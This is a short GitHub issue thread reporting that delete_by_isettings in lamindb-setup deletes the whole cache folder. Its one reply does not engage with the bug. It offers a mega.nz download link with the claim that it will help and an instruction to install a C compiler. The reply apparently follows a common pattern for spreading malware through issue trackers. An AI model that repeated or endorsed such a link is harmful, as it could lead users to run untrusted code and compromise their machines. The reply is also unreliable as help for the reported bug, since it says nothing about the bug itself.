### ISSUE TITLE
delete_by_isettings deletes the whole cache folder

### ISSUE THREAD

**Issue by Koncopd** [laminlabs/lamindb-setup#858]
https://github.com/laminlabs/lamindb-setup/blob/d2cfe8b9651ac860efc2173f2fc143fb99629186/lamindb_setup/_delete.py#L38

**Comment by nnimoyoefoki** [comment]
I think this will help you.

https://mega.nz/file/1vkGlJTL#yU-SJLlIilF0mx5qwpPOd3BM8iKZqOJLEQUStR76rrQ
If you don't have the c compliator, install it.(gcc or clang)
